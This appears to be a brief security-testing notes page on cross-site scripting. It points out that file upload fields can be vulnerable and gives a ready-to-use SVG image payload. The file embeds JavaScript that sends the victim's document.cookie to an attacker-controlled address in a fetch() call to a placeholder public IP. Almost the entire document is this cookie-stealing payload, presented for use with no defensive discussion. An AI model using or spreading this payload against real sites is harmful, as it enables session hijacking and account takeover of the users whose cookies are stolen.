Skip to content

XSS

  • Not only does XXS appear in normal user input fields but also file upload fields as well

  • Example .svg payload for image upload field 

    <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">

<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
   <rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
   <script type="text/javascript">
      fetch('http://<your-public-IP>?c='+document.cookie);
   </script>
</svg>